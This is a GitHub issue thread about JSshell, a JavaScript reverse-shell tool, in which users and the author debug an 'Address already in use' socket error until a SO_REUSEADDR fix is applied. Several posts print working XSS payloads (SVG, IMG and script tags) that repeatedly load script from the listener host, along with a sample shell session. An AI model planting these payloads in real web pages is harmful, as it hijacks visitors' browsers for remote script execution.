Hey I got some errors .Help me if possible

[amvinayak]

root@kali:/opt/JSshell# python3 jsh.py -s 192.168.91.129 -p 65001 -g
|( | | |
_|)> | |(/ | |
v2.0

Payloads:

• SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//192.168.91.129:65001"},999)>
• SCRIPT:
• IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//192.168.91.129:65001"},999)>

Listening on [any] 65001 for incoming JS shell ...
Got JS shell from [192.168.91.1] port 61404 to kali 65001 Traceback (most recent call last): File "jsh.py", line 148, in main() File "jsh.py", line 142, in main shell() File "jsh.py", line 75, in shell s.bind(('192.168.91.128', 65001)) OSError: [Errno 98] Address already in use

I tried changing address and port but it didn't worked

[shelld3v]

Hi, sorry for that, let's I check again 🌝

[shelld3v]

Hi @amvinayak, I think the problem is in the code (address)! First, I want to ask did you change anything in my code?

File "jsh.py", line 75, in shell
s.bind(('192.168.91.128', 65001))

==> In my code, I set the bind-address to always 0.0.0.0. I think something has been changed here! Could you try to re-download/re-git my app?

Here is my code:

def shell():
    form = b'''HTTP/1.1 200 OK
Content-Type: application/javascript
Connection: close
'''
    while 1:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(('0.0.0.0', port))
        if secs != 0:
            s.settimeout(secs)
        buffer = input('%sjs-2.0%s$ ' % (red, white))
        s.listen(2)

[shelld3v]

Make sure that you didn't git a forked-repo then create an issue on the original repo 😠😠😠! Also sorry for my delay since I forgot to check my email 😆😆😆

[98Kstar]

Hello, the same thing happened when I received a shell. I did not modify any of your code. Here is my error report.： Listening on [any] 4848 for incoming JS shell ... Got JS shell from [8.210.182.90] port 55706 to fuckerduck 4848 js-2.0$

js-2.0$ Traceback (most recent call last): File "jsh.py", line 150, in main() File "jsh.py", line 144, in main shell() File "jsh.py", line 76, in shell s.bind(('0.0.0.0', port)) OSError: [Errno 98] Address already in use

[amvinayak]

Brother, I tried your new code as well but it didn't work ,the issue persists if possible help me out.

Thanks 😊 for your help anyway 😁

On Sun, Jul 5, 2020, 12:52 shelld3v notifications@github.com wrote:

Hi @amvinayak https://github.com/amvinayak, I think the problem is in the address! First, I want to ask did you change anything in my code?

File "jsh.py", line 75, in shell s.bind(('192.168.91.128', 65001))

==> In my code, I set the bind-address to alway 0.0.0.0. I think something has been changed here! Could you try to re-download/re-git my app?

Here is my code:

def shell(): form = b'''HTTP/1.1 200 OKContent-Type: application/javascriptConnection: close''' while 1: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', port)) if secs != 0: s.settimeout(secs) buffer = input('%sjs-2.0%s$ ' % (red, white)) s.listen(2)

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/shelld3v/JSshell/issues/1#issuecomment-653852335, or unsubscribe https://github.com/notifications/unsubscribe-auth/ANSVHSFWHTSJGBCSJMVPC5LR2AS4LANCNFSM4OPKLV4A .

[amvinayak]

Also after getting the shell it crashes so please look at that specifically

On Sun, Jul 5, 2020, 23:26 VINAYAK . manuvinayak5@gmail.com wrote:

Brother, I tried your new code as well but it didn't work ,the issue persists if possible help me out.

Thanks 😊 for your help anyway 😁

On Sun, Jul 5, 2020, 12:52 shelld3v notifications@github.com wrote:

Hi @amvinayak https://github.com/amvinayak, I think the problem is in the address! First, I want to ask did you change anything in my code?

File "jsh.py", line 75, in shell s.bind(('192.168.91.128', 65001))

==> In my code, I set the bind-address to alway 0.0.0.0. I think something has been changed here! Could you try to re-download/re-git my app?

Here is my code:

def shell(): form = b'''HTTP/1.1 200 OKContent-Type: application/javascriptConnection: close''' while 1: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', port)) if secs != 0: s.settimeout(secs) buffer = input('%sjs-2.0%s$ ' % (red, white)) s.listen(2)

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/shelld3v/JSshell/issues/1#issuecomment-653852335, or unsubscribe https://github.com/notifications/unsubscribe-auth/ANSVHSFWHTSJGBCSJMVPC5LR2AS4LANCNFSM4OPKLV4A .

[shelld3v]

@98Kstar: Can you please choose another port number! Address already in use meaning the port of that IP address has already been used (by another program or something, maybe for listening already).

---

@amvinayak Can you give me the traceroute (the error message):

Traceback (most recent call last):
...blah...blah (I need this)

[98Kstar]

@ 98Kstar：请您选择另一个端口号！Address already in use表示该IP地址的端口已被使用（已被其他程序或其他程序使用，可能已用于侦听）。

@amvinayak能否给我traceroute（错误消息）：

Traceback (most recent call last):
...blah...blah (I need this)

It didn't work. After I tried multiple ports, I reported that error as soon as I received the shell.

[shelld3v]

I think everything is working probably from my side as well:

root@shelld3vcomputer:~/JSshell$ python3 jsh.py -p 8484 -g -c 'confirm("It is worked")' -s 127.0.0.1
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v2.0

Payloads:
 - SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//127.0.0.1:8484
"},999)>
 - SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//127.0.0.1:8484"
},999)</script>
 - IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//127.0.0
.1:8484"},999)>

Listening on [any] 8484 for incoming JS shell ...
Got JS shell from [127.0.0.1] port 30613 to shelld3vcomputer 8484
js-2.0$ confirm("It is worked")
js-2.0$ no crash :)
js-2.0$ var myvar = 'JSshell is runnning'
js-2.0$ var myvar2 = myvar + '!'; alert(myvar2 + ' :)))');
js-2.0$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
domain                The source domain
pwd                   The source path
exit, quit            Exit the JS shell
js-2.0$ domain
localhost:4444
js-2.0$ pwd
/
js-2.0$ exit
root@shelld3vcomputer:~/JSshell$

[shelld3v]

I think I have understood something here, @98Kstar:

For the first time, your JSshell was able to listen on port 4848, which means no program used the port at that time. But after getting the shell, your JSshell tried to listen again and found that port 4848 has already been used. This may be the result of the first bind (listen), maybe your JSshell didn't close the connection when going to start listening again. I don't know why but I have closed the connection in my code:

    if 'Accept' in resp and 'HTTP' in resp:
        print ('Got JS shell from [%s] port %s to %s %s' % (addr[0], addr[1], socket.gethostname(), port))
        for line in resp.split('\n'):
            if 'referer' in line.lower():
                referer = line.lower().replace('referer: ', '')
                domain = referer.split('/')[2]
                pth = '/'.join(referer.split('/')[3:])
                if pth == '\r':
                    pth = '/'
        if len(cmd):
            c.send(form + cmd.encode())
            print('%sjs-2.0%s$ %s' % (red, white, cmd))
        c.close()
        s.close()
        shell()

So can you try to re-download/re-git my JSshell again @98Kstar, thank you! And I will investigate further this issue if the problem still there.

[shelld3v]

Hey, I don't know but this may be the root cause:

            c.send(form + buffer.encode())
            c.close()

I think I need to close also s, not only c (s.close()). And I am going to update it now 🤟🤟🤟 please test it for me 😄😄😄 😆😆😆

[shelld3v]

Updated 🙃🙃🙃 Can you check again the problem after downloading this again 😀😀😀

[shelld3v]

Hi, have everything been fixed? Can you try to re-download and run my program. If everything is working good, I am going to close this now! 😀😀😀😀😀

[amvinayak]

Sorry , But nothing went well bro i reinstalled it three times actually the issue is with binding it does not bind to ports easily hope if you could contact me verbally it would be great and your concern to the family is appreciated.

On Wed, Jul 8, 2020, 11:30 shelld3v notifications@github.com wrote:

Hi, have everything been fixed? Can you try to re-download and run my program. If everything is well, I am going to close it now! 😀😀😀😀😀

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/shelld3v/JSshell/issues/1#issuecomment-655305090, or unsubscribe https://github.com/notifications/unsubscribe-auth/ANSVHSC45NAE3SZB5ALOZKDR2QDPNANCNFSM4OPKLV4A .

[shelld3v]

Hi @amvinayak, I just updated my JSshell yesterday, can you please check again? 😊

---

@98Kstar How about you?

[shelld3v]

@amvinayak Why you want to contact me verbally? Is there any problem outside of this issue? Also, where are you from? 😊

[Ringx3]

awwww

js-2.0$ confirm("It is worked") Traceback (most recent call last): File "jsh.py", line 151, in main() File "jsh.py", line 145, in main shell() File "jsh.py", line 76, in shell s.bind(('0.0.0.0', port)) OSError: [Errno 98] Address already in use

[shelld3v]

@BonjourM3 When did you download/git it?

[Ringx3]

@BonjourM3 When did you download/git it?

today.

[shelld3v]

@BonjourM3 Hey, can I ask that was your first command (confirm("It is worked")) executed in the browser

[Ringx3]

@BonjourM3 Hey, can I ask that was your first command (confirm("It is worked")) executed in the browser

it executed in the browser......

[shelld3v]

@BonjourM3 Thank you for that but I will need time to investigate and fix this since everything just running beautiful in my terminal, so I can't know what was happening in your side. If possible, you can give me some additional information (about your reproduction maybe) that could help me! Also, what python version are you using this? (2 or 3)

[amvinayak]

Traceback (most recent call last): File "jsh.py", line 151, in main() File "jsh.py", line 145, in main

shell() File "jsh.py", line 76, in shell s.bind(('0.0.0.0', port)) OSError: [Errno 98] Address already in use

Thats the error I tried it with python and python3 both but nothing works I see as it just not supports kali wish you could connect via TeamViewer and have a look.

On Wed, Jul 8, 2020, 21:06 shelld3v notifications@github.com wrote:

@BonjourM3 https://github.com/BonjourM3 Thank you for that but I will need time to investigate and fix this since everything just running beautiful in my terminal, so I can't know what was happening in your side. If possible, you can give me some additional information (about your reproduction maybe) that could help me! Also, what python version you are using this? (2 or 3)

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/shelld3v/JSshell/issues/1#issuecomment-655595432, or unsubscribe https://github.com/notifications/unsubscribe-auth/ANSVHSDWQNW5FSQIK5SD4X3R2SHAJANCNFSM4OPKLV4A .

[shelld3v]

Hey everybody, I think the problem has actually been fixed now 😃😃😃 I got the solution after reading a Python socket documentation. It said:

close() releases the resource associated with a connection but does not necessarily close the connection immediately. If you want to close the connection in a timely fashion, call shutdown() before close().

Deeper:

Once a socket is no longer required, the calling program can discard the socket by applying a close subroutine to the socket descriptor. If a reliable delivery socket has data associated with it when a close takes place, the system continues to attempt data transfer. However, if the data is still undelivered, the system discards the data. Should the application program have no use for any pending data, it can use the shutdown subroutine on the socket prior to closing it.

In my situation, the socket has not been closed immediately yet. First, the fact that multiple processes can have a handle for the same underlying socket. Calling close() will decrease the handle count by one, and if the handle count has reached zero, as a natural process, the socket and associated connection goes through the normal close procedure (effectively sending a FIN / EOF to the peer) and the socket is deallocated.

But, if the handle count does not reach zero because another process still has a handle to the socket then the connection is not closed and the socket is not deallocated.

Usually, a socket will only handle a process, an example code is:

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(0)
c, a = s.accept()
c.send(...)
c.close()
s.close()

The socket started listening s.listen(0), then whenever a connection come, it will accept it c, a = s.accept() and no longer accept other connections. But if you look at my payloads:

<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//host:port"},999)>

You will see that it make a range loop that will create script tags with the source is host:port 999 times. Any new script tag will make an HTTP request to the shell to get the javascript source and at the first times of the script generating process, it will make new scripts very fast (I don't know why, you can ask the person who made javascript). So that also means a lot of connections will be made with JSshell at almost the same time and JSshell has accepted and handled many connections, or we can call processes. Use only close() just stop a connection but since other connections still are keeping, the socket has not been closed immediately yet. That's also why when you entering a command, it will be executed many times in the browser.

And the fix is:

---

commit https://github.com/shelld3v/JSshell/commit/051b20259cdd57c0537e3c722dc267ef54bf5d94:

@@ -97,7 +97,9 @@ def shell():
                print(hp)

            c.send(form + buffer.encode())
+++         c.shutdown(socket.SHUT_RDWR)
            c.close()
+++         s.shutdown(socket.SHUT_RDWR)
            s.close()
        except KeyboardInterrupt:
            if sys.platform == 'win32':

---

(I don't know should I shutdown() s or c so I just do it for both 😆😆😆)

Can everyone confirm my fix?

Sorry if bad English 😀

[Ringx3]

Still the same error. js-2.0$ confirm("It is worked") Traceback (most recent call last): File "jsh.py", line 153, in main() File "jsh.py", line 147, in main shell() File "jsh.py", line 76, in shell s.bind(('0.0.0.0', port)) OSError: [Errno 98] Address already in use

[shelld3v]

This is strange! You have updated my new commit, but the problem still exists? Let me check again, thanks!

[Ringx3]

Yes,i have updated the JSshell.

[shelld3v]

@BonjourM3, I just made a new commit https://github.com/shelld3v/JSshell/commit/35ace5a00cdffeac0890cf54a8ad17974a7816a2, changed the shutdown() type, can you please re-download and test it? Thanks, oh god, I hope this time everything will be well! Sorry for this inconvenience when you must delete then download this many times

[Ringx3]

@BonjourM3, I just made a new commit 35ace5a, changed the shutdown() type, can you please re-download and test it? Thanks, oh god, I hope this time everything will be well! Sorry for this inconvenience when you must delete then download this many times

Still the same error as before. And it is my pleasure to test JSshell!

[shelld3v]

😢😢😢 😭😭😭😭😭 Thank you @BonjourM3, if the root cause that I guessed is correct, and shutdown() does not solve the problem, there is another way to solve this, but it will make the shell slower! Even that, I won't do it now, I will fix some more things to test! Also, can I ask that, when you execute confirm("It is worked"), how many times does the code got executed in your browser?

[Ringx3]

Many times."It is worked" will execute in the browser after i click the button.

[shelld3v]

@BonjourM3 That means the root cause that I guessed was correct. But it should be fixed since my new updates! Still don't know why but I will investigate more. Also, does your wifi good? From your response, one of the most important reasons that results to this problem is that your WIFI was too strong 😄😄

[Ringx3]

Sry,i didn't understand the meaning of the "is that your WIFI was too strong"...But i have tested the JSshell on both wired and wireless networks. In addtion, could u tell me the way that you judged whether i test tool over the wireless network.😄

[shelld3v]

Haha! I mean, your wired/wireless network is too fast! Paying $500 just for a good network connection is not the best option, it even breaks your JSshell 😆 I only paid more than $50 for my home network. Also, why do you use JSshell? Finding blind XSS, trolling your friends, hacking DoD or just playing around ❓😊 (I have already known that you are a CTF player)

[Ringx3]

I'm interested in testing some security tools new and i think JSshell maybe userful for my bug hunting.😆

[shelld3v]

OMG! I'm also a bug bounty hunter, welcome to the club! And if you are going to finding blind XSS using my tool, I advise you to use XSS hunter service (free) instead: http://xsshunter.com (But that does not mean you can take back your star in my tool 🤣)

[Ringx3]

thx!

[Ringx3]

i think this issue should be closed. :)

[shelld3v]

Yep, but not today! I will ONLY CLOSE this when the issue has been resolved. Now, I am a little bit busy with my hacking job so the fixing process will be longer.

[tyrantpedal]

Maybe this will help. I also have this issue as of today. What I did notice is after I got the error, then I set up a netcat listener with the same port and as soon as I start it I get the following:

listening on [any] 4455 ... connect to [192.168.119.173] from (UNKNOWN) [192.168.119.173] 37474 GET / HTTP/1.1 Host: 192.168.119.173:4455 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.11.1.73:8080/php/index.php?tg=posts&idx=List&forum=1&thread=1&post=1&flat=1 Connection: close Each time I restart the nc listener I get the same thing. If I go remove the javascript payload from the target, it goes away. Could the issue be that the payload is being repeatedly loaded trying to connect back to your listener?

[shelld3v]

@tyrantpedal Don't use netcat for this. JSshell has so much different than netcat when using for this purpose. I have checked and everything you said above is working as intended. It's how JSshell works (If you know javascript you will know why this is happening, by looking at the payload)

[shelld3v]

The problem is in the JSshell listener, which I'm investigating why it doesn't close all connections

[tyrantpedal]

@tyrantpedal Don't use netcat for this. JSshell has so much different than netcat when using for this purpose. I have checked and everything you said above is working as intended. It's how JSshell works (If you know javascript you will know why this is happening, by looking at the payload)

I understand that. I was just trying to give you additional information that may (or may not) be helpful :)

[shelld3v]

Hello everybody, are you all doing well? 😃 I just updated some stuff in code, hope it can fix the bug. Can you please recheck it? Thank you and hope you are having a beautiful day 😀

[loySoGxj]

Add setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) after s = socket.socket(socket.AF_INET, socket.SOCK_STREAM). Having seen this in late August, I doubt that he knew of this issue. Enjoy your hacking life!

[shelld3v]

@loySoGxj Thank you for your help, will try!

[shelld3v]

Updated 🥰

[shelld3v]

I am closing it now, thank you for your help @loySoGxj